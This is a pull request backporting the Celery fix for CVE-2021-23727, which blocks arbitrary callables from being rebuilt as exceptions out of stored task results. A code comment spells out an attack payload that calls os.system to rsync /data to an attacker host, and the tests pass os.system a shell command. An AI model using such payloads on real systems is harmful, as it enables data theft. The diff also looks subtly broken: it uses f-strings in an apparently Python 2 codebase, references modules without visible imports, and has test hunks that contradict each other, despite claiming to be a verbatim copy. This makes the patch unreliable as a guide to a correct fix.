### PR TITLE
vuln: backported CVE-2021-23727 fix from upstream

### DIFF
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -29,7 +29,7 @@ from kombu.utils.url import maybe_sanitize_url
 from celery import states
 from celery import current_app, maybe_signature
 from celery.app import current_task
-from celery.exceptions import ChordError, TimeoutError, TaskRevokedError
+from celery.exceptions import ChordError, TimeoutError, TaskRevokedError, SecurityError
 from celery.five import items
 from celery.result import (
     GroupResult, ResultBase, allow_join_result, result_from_tuple,
@@ -177,12 +177,73 @@ class BaseBackend(object):
 
     def exception_to_python(self, exc):
         """Convert serialized exception to Python exception."""
-        if exc:
-            if not isinstance(exc, BaseException):
-                exc = create_exception_cls(
-                    from_utf8(exc['exc_type']), __name__)(exc['exc_message'])
+        if not exc:
+            return None
+        elif isinstance(exc, BaseException):
             if self.serializer in EXCEPTION_ABLE_CODECS:
                 exc = get_pickled_exception(exc)
+            return exc
+        elif not isinstance(exc, dict):
+            try:
+                exc = dict(exc)
+            except TypeError as e:
+                raise TypeError(f"If the stored exception isn't an "
+                                f"instance of "
+                                f"BaseException, it must be a dictionary.\n"
+                                f"Instead got: {exc}") from e
+
+        exc_module = exc.get('exc_module')
+        try:
+            exc_type = exc['exc_type']
+        except KeyError as e:
+            raise ValueError("Exception information must include"
+                             "the exception type") from e
+        if exc_module is None:
+            cls = create_exception_cls(
+                exc_type, __name__)
+        else:
+            try:
+                # Load module and find exception class in that
+                cls = sys.modules[exc_module]
+                # The type can contain qualified name with parent classes
+                for name in exc_type.split('.'):
+                    cls = getattr(cls, name)
+            except (KeyError, AttributeError):
+                cls = create_exception_cls(exc_type,
+                                           celery.exceptions.__name__)
+        exc_msg = exc.get('exc_message', '')
+
+        # If the recreated exception type isn't indeed an exception,
+        # this is a security issue. Without the condition below, an attacker
+        # could exploit a stored command vulnerability to execute arbitrary
+        # python code such as:
+        # os.system("rsync /data attacker@192.168.56.100:~/data")
+        # The attacker sets the task's result to a failure in the result
+        # backend with the os as the module, the system function as the
+        # exception type and the payload
+        # rsync /data attacker@192.168.56.100:~/data
+        # as the exception arguments like so:
+        # {
+        #   "exc_module": "os",
+        #   "exc_type": "system",
+        #   "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+        # }
+        if not isinstance(cls, type) or not issubclass(cls, BaseException):
+            fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'
+            raise SecurityError(
+                f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")
+
+        # XXX: Without verifying `cls` is actually an exception class,
+        #      an attacker could execute arbitrary python code.
+        #      cls could be anything, even eval().
+        try:
+            if isinstance(exc_msg, (tuple, list)):
+                exc = cls(*exc_msg)
+            else:
+                exc = cls(exc_msg)
+        except Exception as err:  # noqa
+            exc = Exception(f'{cls}({exc_msg})')
+
         return exc
 
     def prepare_value(self, result):

--- a/celery/tests/backends/test_base.py
+++ b/celery/tests/backends/test_base.py
@@ -250,9 +250,10 @@ class test_BaseBackend_dict(AppCase):
             'exc_module': 'os'
         }
 
-        with pytest.raises(SecurityError,
-                           match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")):
+        with self.assertRaises(SecurityError) as cm:
             self.b.exception_to_python(x)
+
+        self.assertEqual(str(cm.exception), "Expected an exception class, got os.system with payload ('echo 1',)")
 
     def test_not_an_exception_but_another_object(self):
         x = {
@@ -260,10 +261,10 @@ class test_BaseBackend_dict(AppCase):
             'exc_type': 'object',
             'exc_module': 'builtins'
         }
-
-        with pytest.raises(SecurityError,
-                           match=re.escape(r"Expected an exception class, got builtins.object with payload ()")):
+        with self.assertRaises(SecurityError) as cm:
             self.b.exception_to_python(x)
+
+        self.assertEqual(str(cm.exception), "Expected an exception class, got builtins.object with payload ()")
 
 
 class test_KeyValueStoreBackend(AppCase):

--- a/celery/tests/backends/test_base.py
+++ b/celery/tests/backends/test_base.py
@@ -1,11 +1,12 @@
 from __future__ import absolute_import
 
+import re
 import sys
 import types
 
 from contextlib import contextmanager
 
-from celery.exceptions import ChordError
+from celery.exceptions import ChordError, SecurityError
 from celery.five import items, range
 from celery.utils import serialization
 from celery.utils.serialization import subclass_exception
@@ -238,6 +239,31 @@ class test_BaseBackend_dict(AppCase):
         b._cache['foo'] = 1
         self.assertTrue(b.is_cached('foo'))
         self.assertFalse(b.is_cached('false'))
+
+    def test_not_an_actual_exc_info(self):
+        pass
+
+    def test_not_an_exception_but_a_callable(self):
+        x = {
+            'exc_message': ('echo 1',),
+            'exc_type': 'system',
+            'exc_module': 'os'
+        }
+
+        with pytest.raises(SecurityError,
+                           match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")):
+            self.b.exception_to_python(x)
+
+    def test_not_an_exception_but_another_object(self):
+        x = {
+            'exc_message': (),
+            'exc_type': 'object',
+            'exc_module': 'builtins'
+        }
+
+        with pytest.raises(SecurityError,
+                           match=re.escape(r"Expected an exception class, got builtins.object with payload ()")):
+            self.b.exception_to_python(x)
 
 
 class test_KeyValueStoreBackend(AppCase):


### PR DESCRIPTION
CVE-2021-23727 is a command injection vulnerability. This commit is a
verbatim copy from [1]. For details of the vulnerability see [2].

[1]: https://github.com/celery/celery/commit/5c3f1559df16c32fb8d82918b4497f688d42ad0a
[2]: https://nvd.nist.gov/vuln/detail/CVE-2021-23727